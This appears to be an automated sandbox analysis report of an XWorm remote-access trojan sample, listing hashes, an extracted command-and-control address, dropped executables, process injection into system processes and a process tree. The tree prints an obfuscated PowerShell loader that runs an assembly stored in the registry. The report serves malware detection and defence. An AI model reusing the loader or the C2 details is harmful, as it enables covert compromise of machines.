Analysis
-
max time kernel
60s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
01-07-2024 17:40
Static task
static1
Behavioral task
behavioral1
Sample
x4svchost.exe
Resource
win7-20240221-en
General
-
Target
x4svchost.exe
-
Size
762KB
-
MD5
148ec472df90b0fb274c3ce2ad2e811f
-
SHA1
378ba02b08494b36ff5a2674cf99eba6c7025d6a
-
SHA256
a08b846be9052a2614ef6a6920260d465774f5da9926f6d08449a2e4eb27b787
-
SHA512
ab6764b598d538bc726a1e0baf02c8c4a2ccdedf77ff6b3ee63d1e27c0a05e13423142b86f38afbd9462c0d90b5c3a9963a30e110145aca455ffa5403375c5b1
-
SSDEEP
12288:0sjApTtnb0TbQxMM90CL7VmADH2eJGCOTJfVXwAfIXZqPtbxZWdezgrrNo02UBYW:djuTt4TbQRjDH2eJQTNqcWOVZK1y02UH
Malware Config
Extracted
xworm
session-chief.gl.at.ply.gg:36125
-
Install_directory
%LocalAppData%
-
install_file
x4usb.exe
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\x4host.exe family_xworm behavioral1/memory/2932-24-0x0000000001140000-0x0000000001158000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2708 created 424 2708 powershell.EXE winlogon.exe -
Executes dropped EXE 2 IoCs
Processes:
x4Shellcode.exex4host.exepid process 2344 x4Shellcode.exe 2932 x4host.exe -
Drops file in System32 directory 2 IoCs
Processes:
x4Shellcode.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\System32\alg.exe x4Shellcode.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2708 set thread context of 2672 2708 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00aef0d0ddcbda01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEdllhost.exepid process 2708 powershell.EXE 2708 powershell.EXE 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe 2672 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1212 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
x4host.exex4Shellcode.exepowershell.EXEdllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 2932 x4host.exe Token: SeTakeOwnershipPrivilege 2344 x4Shellcode.exe Token: SeDebugPrivilege 2708 powershell.EXE Token: SeDebugPrivilege 2708 powershell.EXE Token: SeDebugPrivilege 2672 dllhost.exe Token: SeAuditPrivilege 848 svchost.exe -
Suspicious use of WriteProcessMemory 42 IoCs
Processes:
x4svchost.exetaskeng.exepowershell.EXEdllhost.exedescription pid process target process PID 2884 wrote to memory of 2344 2884 x4svchost.exe x4Shellcode.exe PID 2884 wrote to memory of 2344 2884 x4svchost.exe x4Shellcode.exe PID 2884 wrote to memory of 2344 2884 x4svchost.exe x4Shellcode.exe PID 2884 wrote to memory of 2344 2884 x4svchost.exe x4Shellcode.exe PID 2884 wrote to memory of 2932 2884 x4svchost.exe x4host.exe PID 2884 wrote to memory of 2932 2884 x4svchost.exe x4host.exe PID 2884 wrote to memory of 2932 2884 x4svchost.exe x4host.exe PID 1328 wrote to memory of 2708 1328 taskeng.exe powershell.EXE PID 1328 wrote to memory of 2708 1328 taskeng.exe powershell.EXE PID 1328 wrote to memory of 2708 1328 taskeng.exe powershell.EXE PID 2708 wrote to memory of 2672 2708 powershell.EXE dllhost.exe PID 2708 wrote to memory of 2672 2708 powershell.EXE dllhost.exe PID 2708 wrote to memory of 2672 2708 powershell.EXE dllhost.exe PID 2708 wrote to memory of 2672 2708 powershell.EXE dllhost.exe PID 2708 wrote to memory of 2672 2708 powershell.EXE dllhost.exe PID 2708 wrote to memory of 2672 2708 powershell.EXE dllhost.exe PID 2708 wrote to memory of 2672 2708 powershell.EXE dllhost.exe PID 2708 wrote to memory of 2672 2708 powershell.EXE dllhost.exe PID 2708 wrote to memory of 2672 2708 powershell.EXE dllhost.exe PID 2672 wrote to memory of 424 2672 dllhost.exe winlogon.exe PID 2672 wrote to memory of 476 2672 dllhost.exe services.exe PID 2672 wrote to memory of 492 2672 dllhost.exe lsass.exe PID 2672 wrote to memory of 500 2672 dllhost.exe lsm.exe PID 2672 wrote to memory of 608 2672 dllhost.exe svchost.exe PID 2672 wrote to memory of 684 2672 dllhost.exe svchost.exe PID 2672 wrote to memory of 772 2672 dllhost.exe svchost.exe PID 2672 wrote to memory of 812 2672 dllhost.exe svchost.exe PID 2672 wrote to memory of 848 2672 dllhost.exe svchost.exe PID 2672 wrote to memory of 972 2672 dllhost.exe svchost.exe PID 2672 wrote to memory of 240 2672 dllhost.exe svchost.exe PID 2672 wrote to memory of 296 2672 dllhost.exe spoolsv.exe PID 2672 wrote to memory of 1076 2672 dllhost.exe svchost.exe PID 2672 wrote to memory of 1112 2672 dllhost.exe taskhost.exe PID 2672 wrote to memory of 1160 2672 dllhost.exe Dwm.exe PID 2672 wrote to memory of 1212 2672 dllhost.exe Explorer.EXE PID 2672 wrote to memory of 1612 2672 dllhost.exe DllHost.exe PID 2672 wrote to memory of 3020 2672 dllhost.exe svchost.exe PID 2672 wrote to memory of 2980 2672 dllhost.exe sppsvc.exe PID 2672 wrote to memory of 2932 2672 dllhost.exe x4host.exe PID 2672 wrote to memory of 1328 2672 dllhost.exe taskeng.exe PID 2672 wrote to memory of 2708 2672 dllhost.exe powershell.EXE PID 2672 wrote to memory of 2728 2672 dllhost.exe conhost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{9105bb3f-5047-4b83-b5b0-4e0077a03796}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {B0AEA794-863D-4A0B-8EDA-068C24AE98F6} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'FT'+[Char](87)+''+[Char](65)+'RE').GetValue(''+[Char](120)+''+[Char](52)+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\x4svchost.exe"C:\Users\Admin\AppData\Local\Temp\x4svchost.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\x4host.exe"C:\Users\Admin\AppData\Local\Temp\x4host.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1362757830-21384515393198194417472438931599184708161984345819503547441451025981"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exeFilesize
731KB
MD5851be4e85b0f111883680e87099483a3
SHA1155e19ad0d2ec4bef3ba25512b6e8bc403350ec9
SHA256ba2d2058ab95d39a9c05c9c74dfa7c860cc662f33ecd96c35f2c344666472197
SHA512bcfd99df20ba3e713801f9c41bc924379f4f6078703ec1d44e90ec3649aa1b2fce6ce802a71a0297516ccf344c627c91359434b7166d716dea69ab41c1fecce6
-
C:\Users\Admin\AppData\Local\Temp\x4host.exeFilesize
68KB
MD5fd744070409a72b86cc2b344d1719b33
SHA1d58ded881812057a3b51e6f753ffbfe243af112e
SHA256d2fd71588dd2d33c5ad58c1a5382de38227ad86092cae7401ee95c7701282730
SHA5128ebde5880105f2831377c26800fdd2b482bd2fdfc5c5539ce0901828d78bd1d2475474cc5859e3a0f92a305a21bd3c1c98834e1746402d708e84622e088717d9
-
memory/424-46-0x0000000000B90000-0x0000000000BB6000-memory.dmpFilesize
152KB
-
memory/424-48-0x0000000000B90000-0x0000000000BB6000-memory.dmpFilesize
152KB
-
memory/424-49-0x0000000000C40000-0x0000000000C6C000-memory.dmpFilesize
176KB
-
memory/424-50-0x0000000000C40000-0x0000000000C6C000-memory.dmpFilesize
176KB
-
memory/424-56-0x0000000000C40000-0x0000000000C6C000-memory.dmpFilesize
176KB
-
memory/424-57-0x000007FEBE200000-0x000007FEBE210000-memory.dmpFilesize
64KB
-
memory/424-58-0x00000000371E0000-0x00000000371F0000-memory.dmpFilesize
64KB
-
memory/476-72-0x00000000371E0000-0x00000000371F0000-memory.dmpFilesize
64KB
-
memory/476-71-0x000007FEBE200000-0x000007FEBE210000-memory.dmpFilesize
64KB
-
memory/476-70-0x0000000000C50000-0x0000000000C7C000-memory.dmpFilesize
176KB
-
memory/476-64-0x0000000000C50000-0x0000000000C7C000-memory.dmpFilesize
176KB
-
memory/492-78-0x00000000000E0000-0x000000000010C000-memory.dmpFilesize
176KB
-
memory/492-84-0x00000000000E0000-0x000000000010C000-memory.dmpFilesize
176KB
-
memory/492-85-0x000007FEBE200000-0x000007FEBE210000-memory.dmpFilesize
64KB
-
memory/492-86-0x00000000371E0000-0x00000000371F0000-memory.dmpFilesize
64KB
-
memory/2344-29-0x0000000000400000-0x00000000004B9000-memory.dmpFilesize
740KB
-
memory/2344-22-0x0000000000390000-0x00000000003F7000-memory.dmpFilesize
412KB
-
memory/2344-11-0x0000000000390000-0x00000000003F7000-memory.dmpFilesize
412KB
-
memory/2344-10-0x0000000000400000-0x00000000004B9000-memory.dmpFilesize
740KB
-
memory/2672-36-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2672-35-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2672-42-0x0000000076F80000-0x000000007709F000-memory.dmpFilesize
1.1MB
-
memory/2672-43-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2672-40-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2672-41-0x00000000771A0000-0x0000000077349000-memory.dmpFilesize
1.7MB
-
memory/2672-38-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2672-37-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2708-30-0x000000001A110000-0x000000001A3F2000-memory.dmpFilesize
2.9MB
-
memory/2708-34-0x0000000076F80000-0x000000007709F000-memory.dmpFilesize
1.1MB
-
memory/2708-33-0x00000000771A0000-0x0000000077349000-memory.dmpFilesize
1.7MB
-
memory/2708-32-0x00000000013B0000-0x00000000013DA000-memory.dmpFilesize
168KB
-
memory/2708-31-0x0000000000870000-0x0000000000878000-memory.dmpFilesize
32KB
-
memory/2884-0-0x000007FEF5543000-0x000007FEF5544000-memory.dmpFilesize
4KB
-
memory/2884-25-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmpFilesize
9.9MB
-
memory/2884-4-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmpFilesize
9.9MB
-
memory/2884-1-0x0000000000B40000-0x0000000000C04000-memory.dmpFilesize
784KB
-
memory/2932-23-0x000007FEF5543000-0x000007FEF5544000-memory.dmpFilesize
4KB
-
memory/2932-24-0x0000000001140000-0x0000000001158000-memory.dmpFilesize
96KB